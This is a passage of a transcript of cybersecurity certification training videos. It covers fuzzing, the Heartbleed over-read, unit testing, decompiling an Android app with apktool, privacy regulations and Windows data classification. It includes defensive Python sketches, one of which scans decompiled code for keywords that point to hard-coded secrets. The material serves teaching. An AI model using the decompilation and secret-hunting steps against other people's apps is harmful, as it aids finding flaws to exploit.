So, fuzz testing is quite standard; it means feeding abnormal data to an app, data the app doesn't expect. Maybe that would include doing things such as passing a number to a string variable, just to see what's going to happen. In some cases, if input isn't validated properly, that could cause a malfunction of the app where the app no longer responds or, in some cases, even the host OS crashes. It can also expose reading beyond the memory required to store a value. This is a typical generic overflow type of attack, where memory checking isn't really being performed properly for either data being read from memory or data being written to memory.
So, the Heartbleed bug is an example of a buffer overflow attack at the read level, where we might supply a
web app that uses OpenSSL, that's where the Heartbleed bug stems from. And we might tell the web app that
we're requesting something from memory that's only so many characters long, in other words, if we were to
feed it the word DOG, we'd want the server to report back DOG, D-O-G. But at the same time, we might have
constructed that request, so that even though it looks like three characters, we've given the server instruction to
return the next thousand characters in memory. And so that's a buffer overflow read type of attack. So, fuzzing
can be used to ensure that an application doesn't crash when being fed abnormal data because otherwise that
would be a denial-of-service attack. Fuzzing also allows us to make sure that sensitive details aren't being
disclosed such as when unanticipated data is fed to an app and it spits back an error message.
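Here is a rough sketch of that idea in Python: a tiny fuzz loop that feeds random, malformed byte strings to a hypothetical parse_record function and records any unhandled exception rather than letting it take the service down. Real fuzzers such as AFL or libFuzzer are far more sophisticated, but the principle is the same.

# Toy fuzzing sketch: feed random, malformed input to a function under test and
# record crashes instead of letting them become a denial of service.
# Assumption: parse_record stands in for the real code being tested.
import os
import random

def parse_record(data: bytes) -> str:
    # Stand-in for the real parsing code under test.
    return data.decode("utf-8")[:100]

crashes = []
for _ in range(1000):
    blob = os.urandom(random.randint(0, 64))   # random length, random bytes
    try:
        parse_record(blob)
    except Exception as exc:                   # a crash here is a finding
        crashes.append((blob, repr(exc)))

print(f"{len(crashes)} inputs caused unhandled exceptions")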
In this video, find out how to break down larger IT solutions into smaller components for focused testing.
Objectives
[Video description begins] Topic title: Unit Testing. The presenter is Dan Lachance. [Video description ends]
There are a number of different types of testing methodologies that can be applied to software solutions. And
one of those is unit testing. Unit testing is applied to a code module. You might wonder what exactly does that
mean? Well, in a larger application, you might have a team of developers each working on a specific function
or some kind of specified functionality within an application. And so that specific functionality might be its
own unit at the software level, might be its own software component or microservice, might even run in its
own container. And so we're talking about testing just those types of things as opposed to having to test the
entire application when only a single change is required. So, application containerization has become popular
and that's why that shows up here as we're talking about unit testing. So, it's modular code.
The other thing is that we can check out that module or that microservice that chunk of code for testing
purposes. While it's checked out that code is still visible to other developers in the team, but they can't make
changes to it. It also allows for modular code scaling because it's its own piece of code. It is its own software
entity. And if we've got one aspect of an app like printing that's busier than others, then we could scale just the
printing unit or code module. So, creating unit tests, though, can be time consuming. And that's because we
might have to build a number of unit tests for different code modules or microservices. However, it's one of
those things that's worth the upfront investment in time. So, when we work with unit testing, the first order of
business is writing the original code.
Next would be testing the code, that would be a static kind of test analysis because the code's not yet been
compiled. Now after the code is compiled and further testing takes place, often functional testing of the
change, then we can fix the code. Any code changes that are applied are then tested again, and we go through this cycle over and over again. But the benefit of continuous monitoring of code, making sure
it's secure, is that you end up with a better product and also you can detect security flaws quicker. And if you
have an automated code build and testing environment, then it doesn't take very long to make code changes
and then get them deployed out to the user base.
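As a concrete example, here is a minimal unit test sketch using Python's built-in unittest module. The apply_discount function is a hypothetical code unit; the point is that this one module can be tested on its own, and the same tests can be rerun automatically on every check-in.

# Minimal unit test sketch with Python's built-in unittest module.
# The apply_discount function is a hypothetical unit of code under test.
import unittest

def apply_discount(price: float, percent: float) -> float:
    if not 0 <= percent <= 100:
        raise ValueError("percent must be between 0 and 100")
    return round(price * (1 - percent / 100), 2)

class ApplyDiscountTests(unittest.TestCase):
    def test_normal_discount(self):
        self.assertEqual(apply_discount(100.0, 25), 75.0)

    def test_rejects_invalid_percent(self):
        # Input validation is part of the unit's contract, so test it too.
        with self.assertRaises(ValueError):
            apply_discount(100.0, 150)

if __name__ == "__main__":
    unittest.main()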
In this video, you will use the apktool to reverse engineer an Android app.
Objectives
[Video description begins] Topic title: Android App Reverse Engineering. The presenter is Dan
Lachance. [Video description ends]
Reverse engineering is all about stepping backwards through a specific process to determine what might have
been done at the beginning.
[Video description begins] A window called "dlachance@kali: ~" is open. The prompt
"root@kali:/decompile#" is displayed. [Video description ends]
You might use this if there are indicators of compromise in enterprise security logs and you want to trace back
to how a compromise might have begun, including at the reconnaissance stage. But reverse engineering also includes things like decompiling code. In other words, taking an app and decompiling it to the point where it was source code. So, you can look at the source code. Malicious users will use this as a way to detect
any computer programming flaws in the code, and then try to take advantage of it. So, here in Linux, I've
already downloaded a sample called app1.apk.
[Video description begins] He executes the following command: ls. The output reads "app1.apk". The prompt
does not change. [Video description ends]
The apk file extension is for an Android packaged application for an Android device, such as an Android-based smartphone or tablet. So, what I'm going to do then is decompile this application to reveal its source code. Now, you can also do this legitimately, as a way to harden code. Malicious users, as we mentioned, will use this to try to find weaknesses that they will then try to take advantage of. So, I'm
going to go ahead then and run the Apktool built into Kali Linux. And I'll specify a space and then d. Now, the lowercase d here means decompile, and I'll simply pass it the name of the file and press Enter.
[Video description begins] He executes the following command: apktool d app1.apk. The output displays that
the Apktool 2.4.0-dirty is used on app1.apk. The prompt does not change. [Video description ends]
Now, what should happen when this is completed is that it should create a subdirectory in its current location, so within the /decompile folder, it should create a subdirectory called app1.
[Video description begins] He executes the following command: clear. No output returns and the screen
clears. [Video description ends]
And we can then go through that subdirectory to take a peek at any resultant files, including looking at some
source code and everything related to that.
[Video description begins] He executes the following command: ls. The output reads "app1 app1.apk". The
prompt does not change. [Video description ends]
So, there are going to be a number of different files, and we're going to use the GUI in Kali Linux to look through
that.
[Video description begins] He executes the following command: cd app1. No output returns and the prompt
changes to "root@kali:/decompile/app1#". [Video description ends]
And so before too long, we'll see that the Apktool has finished, and if I were to clear the screen here in the
command line in Linux and do an ls, indeed, there is an app1 subdirectory.
[Video description begins] He executes the following command: ls. The output displays several files in the
app1 subdirectory. [Video description ends]
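Once the decompiled app1 directory exists, a quick way to see what a malicious user might go hunting for is to scan the output for strings that often indicate weak practices, such as hard-coded credentials or cleartext URLs. Here is a small sketch in Python; the app1 path matches the demo above, and the keyword list is only an example.

# Small sketch: scan apktool output for strings that often indicate weak practices.
# Assumptions: run from the /decompile folder shown in the demo; the keyword
# list is illustrative only.
import os

keywords = ("password", "secret", "api_key", "http://")

for root, _dirs, files in os.walk("app1"):
    for name in files:
        if not name.endswith((".smali", ".xml", ".txt")):
            continue
        path = os.path.join(root, name)
        with open(path, errors="ignore") as handle:
            for lineno, line in enumerate(handle, 1):
                if any(keyword in line.lower() for keyword in keywords):
                    print(f"{path}:{lineno}: {line.strip()[:80]}")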
Objectives
[Video description begins] Topic title: Course Summary. [Video description ends]
So, in this course, we've examined security as it relates to software development through the entire
development life cycle, including software vulnerability testing and secure coding practices. We did this by
exploring the Software Development Life Cycle or SDLC and related methodologies. We talked about the importance of addressing security during the entire IT life cycle. We discussed microservices, decoupling, and the benefits of application containerization. We discussed common Platform as a Service software developer service offerings and secure coding practices. We also talked about the benefits of software testing, including both unit and regression testing, and the use of reverse engineering by malicious users to detect programming flaws.
We also talked about how to reverse engineer an Android application using the Apktool.
In our next course, we'll move on to explore the data privacy regulations and standards designed to protect
personally identifiable information, PII, and protected health information or PHI, both on-premises and in the
cloud.
Table of Contents
Objectives
Hi, I'm Dan Lachance. I've worked in various IT roles since the early 1990s, including as a technical trainer, as
a programmer, a consultant as well as an IT tech author and editor. I've held and still hold IT certifications
related to Linux, Novell, Lotus, CompTIA and Microsoft. Some of my specialties over the years have included
networking, IT security, cloud solutions, Linux management and configuration and troubleshooting across a
wide array of Microsoft products. The CS0-002 CompTIA Cybersecurity Analyst or CySA+ Certification Exam is designed for IT professionals looking to gain security analyst skills to perform data analysis, to identify vulnerabilities, threats, and risks to an organization, to configure and use threat detection tools, and to secure and protect an organization's applications and systems.
In this course we're going to explore data privacy, both on premises and in the cloud. And we'll talk about the
standards and regulations for protecting Personally Identifiable Information or PII, and Protected Health
Information, PHI. I'll start by examining various examples of PII and PHI and the role that regulatory
compliance plays in the design and development of organizational security policies. Then I'll explore how HIPAA protects sensitive medical information, how GDPR assures data privacy, and the purpose of PCI DSS for cardholder merchants. Next, I'll demonstrate how to configure both server-based and cloud-based data classification using Windows Server File Server Resource Manager and Amazon Web Services Macie, respectively. Lastly, I'll examine when Data Loss Prevention or DLP solutions should be used for data privacy
and protection. And also I will demonstrate how to use Microsoft Azure to configure DLP policies.
Upon completion of this video, you will be able to recognize examples of personally identifiable information.
Objectives
[Video description begins] Topic title: PII. The presenter is Dan Lachance. [Video description ends]
As a Cyber Security Analyst, you need to be aware of data privacy terminology and also data privacy
standards. Personally Identifiable Information or PII is anything that can be uniquely traced to a single person
to an individual.
[Video description begins] Personally Identifiable Information (PII). [Video description ends]
Now, it could be one or more pieces of information together that leads you back to a single person's identity.
And so, as a result, there are a lot of data privacy regulations, as well as standards, related to the protection of PII.
This includes the collection of it, its transmission over a network, such as whether it's encrypted or not with
HTTPS or through a VPN tunnel. The storage of PII, usually this means encrypting it, protection of data at
rest. The sharing of that data with other organizations. What this brings to mind is the collection of private
information based on a user's web browsing habits being sold to marketers and whether or not that's allowed.
So the usage of that collected data.
Personally Identifiable Information comes in many forms. It might include a web browser cookie. A web
browser cookie is a small text file that is used by a web browser to store session information or preferences for
an app, that type of thing. So depending on what's stored in the web browser cookie would determine whether
or not it's considered PII. Such as unique session information for an authenticated session to a secured website.
Other examples of PII might include user location data through GPS, the Global Positioning System, in other
words, satellite longitude and latitude coordinates. The IP address is considered PII, a user's credit card
number, their mother's maiden name, their street address. The list just goes on and on and on.
Sensitive Personal Information is also called SPI, and it is a form of personally identifiable information. But take a look at some of these examples. An example of SPI might be political party affiliation. It's not necessarily specific and easily traced back to a single individual by itself. For example, there might be some political polls for a specific political party, and that doesn't necessarily trace back to an individual; but combined with other information, perhaps it could, which is why it's Sensitive Personal Information. Other examples would be a person's sexual orientation or their membership in specific trade unions.
Upon completion of this video, you will be able to recognize examples of protected health information.
Objectives
[Video description begins] Topic title: PHI. The presenter is Dan Lachance. [Video description ends]
Protected Health Information, or PHI, is much the same type of thing. It's sensitive data, but focused on the medical industry, primarily in the US when it comes to regulatory standards like HIPAA. It could be past as well as current health information. It can also deal with future health details. You might be
wondering how is that possible. Well, it might relate more to things like the care that will be given based on a
medical insurance plan, how payments will be made and that type of thing. Now, it's important to conduct
periodic audits to ensure that any security controls in place to protect sensitive data are effective.
[Video description begins] PII and PHI Audit Assurance Review. [Video description ends]
So it would begin with first reviewing any related organizational security policies that might currently be in
place to protect PII or PHI. Then evaluating any existing security controls and how effective they are at
protecting that data. Identifying any deficiencies, whether the entire security control is deficient or its
configuration is, and then implementing the changes. In the end, for a modern Cyber Security Analyst, the
protection of sensitive data is more important now than it ever has been in the past.
Upon completion of this video, you will be able to recognize how regulatory compliance often plays a role in
crafting organizational security policies.
Objectives
recognize how regulatory compliance often plays a role in crafting organizational security policies
[Video description begins] Topic title: Regulatory Compliance. The presenter is Dan Lachance. [Video
description ends]
A Cyber Security Analyst needs to have a much deeper knowledge than just the technical side of IT security.
Not that it's not important, it is important, but equally as important is the framework in which we place security
controls to protect assets. And so that's where regulatory compliance kicks in. IT security specialists need to be
aware of security compliance regulations for an organization.
It's going to vary from one company to the next, depending on the nature of the business. Now, often, complying with regulations and laws feeds into crafting our organizational security policies, or changing them over time to reflect the protection of assets in some way.
So think about the applicable regulations for your organization, whether you're a nonprofit organization or you
deal with credit card holder information, or it's a web e-commerce type of site, financial, manufacturing. Every
organization in different parts of the world is going to have to be compliant with some kind of regulation. Now
it's important that we align the controls to protect these assets at the security level with the objectives of the
business.
[Video description begins] Security and Business Objectives. [Video description ends]
We have to think about business processes that might benefit from security controls. They might not even be technical security controls; they might be more administrative or process-based, such as ensuring that no single employee controls an entire business process from beginning to end when it involves money, such as the payment of accounts payable invoices. It also means determining which data assets we have that are covered by the scope of a regulation, such as GDPR in the European Union and the protection of EU citizens' sensitive data.
So regulatory compliance is also going to be important in terms of the incident response plan. Is the routine in place, and ready, so that everybody knows their role and responsibilities in dealing with a specific type of security incident, such as a data breach, and whether we need to contact the appropriate personnel, including public relations for public disclosure where required? For regulatory compliance, we might have to ensure confidentiality and integrity of data. Confidentiality could be achieved using technical solutions like encryption of data at rest. Integrity might come in the form of file hashes so that we can determine if changes or modifications have been made. Regulatory compliance might also dictate how long certain types of data are retained. So, for example, the retention of financial data might be required for a longer period than standard product and service documentation within an organization. You need to know what type of data you have out there and where it is, and it needs to be classified to facilitate things like data retention, so that you know what is financial data versus what is not. The next thing is, as we've mentioned, as part of the incident response plan there might be a requirement to disclose any security incidents, such as those that might affect users' private data, whether it be financially based or not.
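Picking up on the file hash point above, here is a minimal Python sketch of an integrity check: record a SHA-256 digest for a file when it's classified, then compare it later during an audit. The file name is a placeholder assumption.

import hashlib
from pathlib import Path

def sha256_of(path):
    # Compute the SHA-256 digest of a file, reading it in chunks.
    digest = hashlib.sha256()
    with Path(path).open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()

financial_report = "Q3-financials.xlsx"     # placeholder file name
baseline = sha256_of(financial_report)      # stored securely at classification time

# ... later, during a periodic audit ...
if sha256_of(financial_report) != baseline:
    print("Integrity check failed: the file has been modified.")
else:
    print("Integrity check passed: no changes detected.")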
Upon completion of this video, you will be able to describe how HIPAA protects sensitive medical
information.
Objectives
[Video description begins] Topic title: HIPAA. The presenter is Dan Lachance. [Video description ends]
If you're an IT technician for an organization in the United States that might somehow come in contact with
health insurance or medical information, then HIPAA or the Health Insurance Portability and Accountability
Act might be applicable.
[Video description begins] Health Insurance Portability and Accountability Act (HIPAA). [Video description
ends]
First thing to consider is that we're talking here about the protection and limited disclosure of Protected Health
Information which is often referred to as PHI, sometimes ePHI for Electronic Protected Health Information. So
it applies to the United States and organizations that are affected by the HIPAA regulation. So this would
include organizations such as health care providers and health plans that might be offered through medical
insurance companies. So really, HIPAA applies to entities that deal with this kind of information and the
related business associates. HIPAA deals with certain terminology that we should be aware of including
Electronic Medical Record or EMR, as well as Electronic Health Record EHR and Personal Health Record
PHR. Well, it's fine to identify what these stand for, but what do they mean, and what's the difference between the three? An Electronic Medical Record or EMR is the kind of record you would deal with within a small or larger doctor's office, where specific patient medical information is entered. It would be specific to a visit to the doctor, for whatever the reason might be; that's an EMR.
Now, the Electronic Health Record can result from some of those individual doctor visits because the EHR is a little bit more global. This is an Electronic Health Record, a standardized record for you as an individual that can even be accessed across different health care providers. The Personal Health Record or PHR is a little bit different. It means that someone is designated as having control of the Personal Health Record, such as a family member of someone that can't make decisions for themselves.
Now, the Personal Health Record stems from birth all the way through to death. So it's the entire medical
history over a patient's lifetime.
The Health Insurance Portability and Accountability Act or HIPAA also specifies that some physical safeguards should be put in place, such as physical security at the facility level, and rooms or floors within facilities that might need to be secured, perhaps requiring card access. Also, locked equipment racks, especially for storage arrays that contain sensitive medical data. Technical safeguards would include things like Network Access Control or NAC to limit which devices can even make a
connection to the wired or wireless network in the first place. The backup and replication of sensitive medical
information, the proper configuration of firewalls with periodic review of rules to determine their efficacy or
see if there are any gaps where there needs to be new rules configured. And also the use of encryption over the
network and for data at rest.
Upon completion of this video, you will be able to describe how GDPR assures data privacy.
Objectives
[Video description begins] Topic title: GDPR. The presenter is Dan Lachance. [Video description ends]
One of the great things about the Internet from a business perspective is it really facilitates globalization.
[Video description begins] General Data Protection Regulation (GDPR). [Video description ends]
It opens up a much larger marketplace than might have been available decades ago. As a result, if you are dealing with sensitive data from customers in specific regions, there might be regulations that you must adhere to, such as the General Data Protection Regulation, or GDPR. This one is a legislative act of the European Union, the EU. It's designed to essentially put the control of a user's personal data into their hands; the user we're referring to here is, to be specific, an EU citizen. So it's about data privacy of PII, Personally Identifiable Information, in terms of its collection and retention, how that sensitive data gets used, and its sharing.
Now there are some things to think about with GDPR. And we have to look at it from two perspectives. Both
the organization that's working with European Union citizen data and the European Union citizen themselves.
So the individual. Let's start with organizations. Now, the GDPR certainly applies to organizations within the European Union that process EU citizens' personal data, but also to organizations outside of the EU that do so. EU citizens have a number of rights under GDPR. One is clear communication about their personal data being collected, with the ability to opt into or out of that collection, and clear communication about how their collected data, should they opt in, will be used. Individuals also have the right to a simple way to correct inaccurate personal data; of course, they would need access to it in the first place, even just to view it, before they could correct any misinformation. GDPR implementation begins with data inventory.
Now, what does this mean? Why is this relevant? Well, because you can't determine what is Personally Identifiable Information for European Union citizens until you know what type of data is being stored in your environment, whether it's on-premises, in the cloud, or being replicated around the cloud. Data classification is so important. You might, for example, have an automated solution, be it on-premises or cloud-based, that scours through all of your data to look for indications of EU citizens' data, and if found, then GDPR would apply. It's then a matter of performing a risk analysis for threats against that data, and then applying security controls that make sense to protect it. That might be Multi-Factor Authentication when users sign in, to enhance security and protect data produced by an application that supports MFA. It could be the encryption of that data when it's stored, or data masking when modifying, querying, or adding database records, hiding sensitive information like credit card numbers other than perhaps the last four digits. And then, of course, a periodic review of the security controls and practices currently in place to ensure that they are still effective in protecting data properly.
In this video, you will identify the purpose of PCI DSS for cardholder merchants.
Objectives
[Video description begins] Topic title: PCI DSS. The presenter is Dan Lachance. [Video description ends]
If you've worked in IT security for a number of years you've probably heard the term PCI DSS.
[Video description begins] Payment Card Industry Data Security Standard (PCI DSS). [Video description
ends]
It stands for Payment Card Industry Data Security Standard. This is an international standard, as opposed to something like HIPAA, which is specific to medical information in the United States, or GDPR, which is specific to the private data of European Union citizens. Well, how does it apply? Well,
it applies to merchants that will work with credit card holder information. So its purpose is to harden payment
card-processing environments. So not necessarily just the specific system that will handle credit card
information like payment gateways, but the surrounding ecosystem.
Now, each type of credit card will have its own specific compliance details, although there are many similarities that overlap. That means PCI DSS compliance will differ for Visa compared to MasterCard or American Express. PCI DSS requires that a certain number of steps be taken to identify and protect cardholder information, beginning with the identification of cardholder data in the first place. Now, the thing to consider from a merchant standpoint is that you don't want to store credit cardholder information if you don't have to. Why would you store something that you have to secure if you don't need to? It requires more resource and time allocation. If it can be somebody else's problem, so to speak, in a way that is in line with laws, regulations, or standards, then that should be considered. Don't store data you don't need.
So the next thing we would do after identifying cardholder data, using a data classification tool of some kind, is to assess any existing security controls that protect that data, to make sure that they're effective. If they are not, then we need to remediate the situation. It might mean, for example, getting a new firewall appliance if there are known vulnerabilities with the one currently in place and there are no updates available. It might also mean putting something in place such as data masking. So if employees are periodically pulling up credit card transactions on screen, such as when customers call, they probably shouldn't be displaying the entire credit card number. Instead, mask all of it out other than the last four digits. PCI DSS also requires periodic compliance reports.
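As a quick illustration of the masking just described, here is a minimal Python sketch that hides all but the last four digits of a card number before it is displayed. The function name and formatting are illustrative assumptions, not any particular product's behavior.

def mask_card_number(card_number, visible=4):
    # Replace all but the last `visible` digits with asterisks, keeping separators.
    total_digits = sum(ch.isdigit() for ch in card_number)
    digits_seen = 0
    masked = []
    for ch in card_number:
        if ch.isdigit():
            digits_seen += 1
            masked.append(ch if digits_seen > total_digits - visible else "*")
        else:
            masked.append(ch)  # keep spaces or dashes as-is
    return "".join(masked)

print(mask_card_number("4111 1111 1111 1111"))  # prints **** **** **** 1111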
Now, we've got a number of goals listed in PCI DSS, but how those goals are achieved is really up to the specific organization and its security technicians. PCI DSS has a lot of control objectives, specifying what should be done but not exactly how it should be done. So if the goal in PCI DSS is, let's say, to build and maintain a secure network, how do you do that? Well, that might be configuring firewalls appropriately and not allowing traffic through unless it absolutely needs to go through. Changing
system defaults. If the goal is to protect cardholder data, that's a pretty generic statement. Well, security controls could include encrypting data over the network, especially in a public network environment, and also protecting stored data by encrypting data at rest. If the goal is to maintain a vulnerability management program within the organization, part of that might be continual updating of antivirus solutions and applying security to all SDLC (system development or software development life cycle) phases. And if the goal is to implement strong access control?
Well, how do we implement that exactly? It means only granting permissions on a need-to-know basis for cardholder data if you're storing it at all, using unique user accounts in your systems so that accountability and auditing can be enabled, and also physical security controls. So if it turns out that we do need to store cardholder data, we don't want a point-of-sale system, let's say at a gas station, storing that data under the desk where customers can come in; we want to make sure it's physically secured. If the goal is to regularly monitor and test networks, how do we implement a security control that reflects that? Well, we could have continuous network, host, and app monitoring and periodic security tests. If the goal states that we need to maintain an information security policy, that might mean continual review and updating of organizational security policies. So there are a lot of considerations with PCI DSS, where often the general objective of securing an asset is stated but not exactly how to do it.
8. Video: Server-based Data Classification (it_cscysa20_12_enus_08)
During this video, you will learn how to configure data classification using the Windows Server File Server
Resource Manager.
Objectives
configure data classification using Windows Server File Server Resource Manager
[Video description begins] Topic title: Server-based Data Classification. The presenter is Dan
Lachance. [Video description ends]
Data classification is crucial in, first of all, inventorying which data is actually available to an organization, and how it's spread out across multiple branch offices, perhaps being replicated in different geographical regions through the cloud. Either way, it's important to inventory and then classify data types. For instance, if your company is required by regulations to retain financial information for a period of time, in a particular manner, you've got to know which of your data sets are related to financial information. So in Windows Server 2019, I'm going to use the File Server Resource Manager, FSRM, to classify data stored on the server.
So here in my server, I'm going to start by going to the Start menu and firing up the Server Manager. I need to
make sure that the File Server Resource Manager component is actually installed.
[Video description begins] He opens a window labeled "Server Manager". It is divided into three parts: menu
bar, navigation pane, content pane, and a pane labeled "Actions". The navigation pane contains three options
labeled "Dashboard", "Local Server", and "All Servers". The Dashboard option is selected and its
corresponding page is open in the content pane. It is divided into two sections. The first section includes a tile
labeled "QUICK START". It displays five steps to configure a local server. The first step is labeled "Configure
this local server". The second step is labeled "Add Roles and Features". [Video description ends]
So I'm going to click Add roles and features and I'm going to click Next to go through the default settings until
I reach the Roles screen.
[Video description begins] He clicks the Add Roles and Features step and its corresponding wizard opens. The
first page in the wizard is labeled "Before You Begin". He clicks a button labeled "Next". The next page
labeled "Installation Type" displays. He again clicks the Next button. The next page labeled "Server Selection"
displays. Then he clicks the Next button. The next page labeled "Server Roles" displays. It includes a list of
roles and their description. [Video description ends]
We're down to the Fs, I'm going to expand File and Storage Services and underneath that I'll expand File and
iSCSI Services. We can see the File Server component is installed, however, the File Server Resource Manager
or FSRM is not. So I'm going to click in the box to put a checkmark there, and I'll click the Add Features
button. And I'm just going to proceed through the wizard, I'm going to click Next.
[Video description begins] He selects a checkbox adjacent to an app labeled "File and Storage Services (2 of
12 installed)". Its sub options includes an app labeled "File and iSCSI Services(1 of 11 installed)". He selects
a checkbox adjacent to the File and iSCSI Services(1 of 11 installed) app and another list of apps displayed
which includes apps labeled "File Server (Installed)" and "File Server Resource Manager". He points to the
File Server (installed) app. It is selected by default. Then he selects a checkbox adjacent to the File Server
Resource Manager app. A dialog box labeled "Add Roles and Features Wizard" opens. It includes a button
labeled "Add Features". He clicks the Add Features button and the dialog box closes. [Video description ends]
And continue all the way until I get to the last screen to confirm my installation selections, and I'll click the
Install button.
[Video description begins] He clicks the Next button. The next page labeled "Features" displays. Then he
again clicks the Next button and the next page labeled "Confirmation" displays. Then he clicks a button
labeled "Install". The next page labeled "Results" displays. [Video description ends]
So now that we've got that component installed, I'm going to click Close. And I'm going to shut down the
Server Manager, we no longer need it.
[Video description begins] He closes the Server Manager window. [Video description ends]
Now what I want to do is take a look at the file system on this machine. If I navigate to drive D on this server, I've got a couple of folders: one's called Budgets, and I've got another one called SampleFiles where I've got some credit card data. Notice I've got the text Credit card numbers with some fictitious numeric values here that represent credit card numbers.
[Video description begins] He opens a file labeled "CreditCardData" in a Notepad application. [Video
description ends]
So we're going to be classifying this type of data as PII, P-I-I. Notice that if I right-click on a file or even a folder here in the file system, go down to Properties, and take a look at the tabs across the top, notice the presence of the Classification tab.
[Video description begins] He closes the CreditCardData file and right-clicks on it to open a dialog box
labeled "CreditCardData Properties". It contains five tabs labeled "General", "Classification", "Security",
"Details", and "Previous Versions". [Video description ends]
That is only there because we just installed the File Server Resource Manager or FSRM component.
Otherwise, you wouldn't see it. So I could manually come here, go under Classification and if I've configured
some properties, which we haven't done yet.
[Video description begins] He selects the Classification tab and its corresponding table with two columns and
no row displays. The column headers are Name and Value. [Video description ends]
I could manually classify this, but you can also schedule your server to scour through the data, look for certain patterns, and automatically classify it. Let's explore those options. So I'm going to make sure I go to the Start menu here, because I want to start up the File Server Resource Manager tool.
[Video description begins] He closes the CreditCardData Properties dialog box. [Video description ends]
So I'm going to go down under Windows Administrative Tools, and in the Fs there's File Server Resource
Manager. Let's fire that up. This tool can be used for a number of items, like file screening to limit which types
of files are allowed on servers and so on. But we are interested in classification management, I'm going to
expand that.
[Video description begins] A window labeled "File Server Resource Manager" opens. It is divided into three
parts: menu bar, navigation pane, and content pane. The navigation pane contains a root node labeled "File
Server Resource Manager (Local)". It includes a folder labeled "Classification Management". The root node
is selected and its corresponding folders are displayed in the content pane. [Video description ends]
I'm going to start by going to Classification Properties. Here we can see properties that can be used to assign
certain types of metadata to files in the file system, files and folders, actually.
[Video description begins] He expands the Classification Management folder which contains two files labeled
"Classification Properties" and "Classification Rules". He selects the Classification Properties file and a table
with multiple columns and three rows displays in the content pane. The column headers are Name, Scope, and
Usage. [Video description ends]
Now I can right-click on that and choose Create a Local Property. For example here, I'm going to create a
property called PII.
[Video description begins] He right-clicks on the Classification Properties file in the navigation pane and a flyout opens which includes an option labeled "Create Local Property". He clicks the Create Local Property option and a dialog box labeled "Create Local Classification Property" opens. [Video description ends]
I can put in a description, but I'm not going to do that. And I can determine if it's a Yes/No type of item, which in this case makes sense. But it could also be a Date-time piece of metadata, or a numeric or multiple choice value.
[Video description begins] He types PII in a text box labeled "Name". Then he points to a text box labeled
"Description". Then he points to a table with three columns and two rows. The first column header is empty.
The second and third column headers are Value and Description respectively. The row entries under the Value
column headers are Yes and No. The Description column is empty. [Video description ends]
That would be useful, for example, if we want to be able to assign certain files to certain projects, departments, or cost centers for classification purposes. But in this case, Yes/No will do the trick. So I'm going to go ahead and click OK. So now we've got our PII, Personally Identifiable Information, label.
[Video description begins] He clicks a drop-down list box labeled "Property Type". A drop-down list box
opens which includes options labeled "Yes/No", "Date-time", "Number", and "Multiple Choice List". He keeps
the Yes/No option as default. He closes the Create Local Classification Property dialog box. A new row adds
in the table displayed in the content pane. The new row entries under the Name, Scope, Usage, Type, and
Possible Values column headers are PII, Local, File Classification, Yes/No, and Yes, No respectively. [Video
description ends]
Let's go back into the file system for just a second. If we right-click on a file or a folder, go into Properties once again, and select Classification, notice the presence of PII because we just added that local property.
[Video description begins] He switches to the SampleFiles folder. He right-clicks on the CreditCardData file
to open the CreditCardData Property dialog box. He clicks the Classification tab and its corresponding table
displays. The table includes a row entry. The row entries under the Name and Value column headers are PII
and (None). [Video description ends]
Now it's currently set to None, and as I've mentioned, we could manually flag items, or classify them and say yes, the credit card data file is Personally Identifiable Information, let's flag it as such. However, that takes a lot of work, and we should use automation wherever possible, which is what we're going to do.
[Video description begins] He points to a radio button labeled "None". Then he selects a radio button labeled
"Yes". The value under the Value column header changes to Yes. [Video description ends]
So let's go back to the File Server Resource Manager, I'm going to go to Classification Rules.
[Video description begins] He did not save the changes and closes the CreditCardData Property dialog
box. [Video description ends]
Where I'm going to right-click on that and choose Create Classification Rule.
[Video description begins] He switches to the File Server Resource Manager window. Then he right-clicks on
the Classification Rules file in the navigation pane. A flyout opens which includes an option labeled "Create
Classification Rule". He clicks the Create Classification Rule option and a dialog box labeled "Create
Classification Rule" opens. It contains four tabs labeled "General", "Scope", "Classification", and "Evaluation
Type". The General tab is selected by default. [Video description ends]
This is going to be Seek PII, and under Scope, I'll click the Add button and tell it I want to look on drive D on This PC. Now, I could tell it to look within a folder.
[Video description begins] He types Seek PII in a text box labeled "Rule name". Then he clicks the Scope tab
and its corresponding options displayed. He clicks a button labeled "Add". A dialog box labeled "Browse For
Folder" opens. It includes a root node labeled "This PC". [Video description ends]
It doesn't have to be an entire drive or anything like that, so I'm going to go down and choose drive D. I'll click
OK, then I have to click on Classification.
[Video description begins] He expands the root node and its folders display in the hierarchy. He selects a
folder labeled "New Volume (D:)". Then he selects a button labeled "OK" and the Browse For Folder dialog
box closes. [Video description ends]
I want to look at the content within files. So that's fine, and notice what shows up here, our local property that
we created.
[Video description begins] He clicks the Classification tab and its corresponding options display. He points to
an option labeled "Content Classifier" in a drop-down list box labeled "Choose a method to assign a property
to files". Then he points to an option labeled "PII" in a drop-down list box labeled "Choose a property to
assign to files". [Video description ends]
What I want to do is assign a value of Yes to our PII property, but we haven't identified yet under which
conditions.
[Video description begins] He points to an option labeled "Yes" in a drop-down list box labeled "Specify a
value". [Video description ends]
So to do that, I'll click Configure so that we can tell it what we're looking for when we want to flag things as
PII Yes. So I'm going to basically tell it that I'm looking for a string, it's not going to be case-sensitive.
[Video description begins] A dialog box labeled "Classification Parameters" opens. It includes a table with
four columns and a row. The column headers are Expression Type, Expression, Minimum Occurrence and
Maximum Occurrence. The row entry under the Expression Type column header contains a drop-down list box
with a default option labeled "Regular expression". [Video description ends]
Notice you could also use regular expressions, in other words, very detailed syntactical pattern matching. But
I'm simply going to choose String, and we're just going to look for the word credit. That's all I'm interested in:
if it's got the word credit in it, that's enough for me. I want it to be treated as Personally Identifiable
Information, so we can go ahead and do that.
[Video description begins] He clicks the drop-down list box under the Expression Type column header. A
drop-down list of options displays. The options are labeled "String (case-sensitive)" and "String". He selects
the String option. Then he types credits and 1 under the Expression and Minimum Occurrence column headers
respectively. [Video description ends]
So I'm going to go ahead and click on OK. So we've now got that configured. We're looking for the word
credit.
[Video description begins] He clicks a button labeled "OK" and the Classification Properties dialog box
closes. Then he clicks the Configure button in the Create Classification Rule dialog box and the Classification
Properties dialog box opens. Then he points to credits under the Expression column header and closes the
Classification Properties dialog box. He clicks the Scope tab in the Create Classification Rule dialog box and
its corresponding options display. [Video description ends]
And we're looking for it on drive D and what we're going to do is classify it as PII with a value of Yes. So I'm
going to go ahead and click OK.
[Video description begins] He selects the Classifications tab. Then he points to the PII option in the Choose a
